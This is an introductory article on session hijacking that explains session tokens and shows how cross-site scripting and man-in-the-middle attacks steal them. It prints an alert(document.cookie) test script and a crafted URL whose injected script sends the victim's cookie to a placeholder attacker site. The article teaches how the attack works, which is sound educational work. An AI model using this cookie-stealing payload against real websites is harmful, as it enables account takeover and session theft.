Basics of Session Hijacking

Session hijacking ( cookie hijacking or cookie side-jacking) is a cyber-attack in which attackers take over a legitimate user’s computer session to obtain their session ID and then act as that user on any number of network services. This type of attack is hazardous to application security because it allows attackers to gain unauthorized access to protected accounts under the legitimate user.

The http connection is a state less connection, the web server needs a method to recognize every user’s connections. The most useful method depends on a token that the Web Server sends to the client browser after a successful client authentication. A session token is normally composed of a string of variable width and it could be used in different ways, like in the URL, in the header of the http requisition as a cookie, in other parts of the header of the http request, or yet in the body of the http requisition. The Session Hijacking attack compromises the session token by stealing or predicting a valid session token to gain unauthorized access to the Web Server. The session token could be compromised in different ways.

The attacker can compromise the session token by using malicious code or programs running at the client-side. The example shows how the attacker could use an XSS attack to steal the session token. If an attacker sends a crafted link to the victim with the malicious JavaScript, when the victim clicks on the link, the JavaScript will run and complete the instructions made by the attacker. The example in figure 3 uses an XSS attack to show the cookie value of the current session; using the same technique it’s possible to create a specific JavaScript code that will send the cookie to the attacker.



<SCRIPT>

alert(document.cookie);

</SCRIPT>

For example, attackers may distribute emails or messages with a specially crafted link pointing to a known and trusted website but containing HTTP query parameters that exploit a known vulnerability to inject script code. For an XSS attack used for session hijacking, the code might send the session key to the attacker’s own website, for instance:

http://www.TrustedSearchEngine.com/search?<script>location.href='http://www.atacker.com/hijacker.php?cookie='+document.cookie;</script>

This would read the current session cookie using document.cookie and send it to the attacker’s website by setting the location URL in the browser using location.href. In real life, such links may use character encoding to obfuscate the code and URL shortening services to avoid suspiciously long links. In this case, a successful attack relies on the application and web server accepting and executing unsanitized input from the HTTP request.

By using Man in the middle attack and Man in the middle browser attack intercept the information exchange between the client and the server. By this we attacker also compromise the Session veriables easily.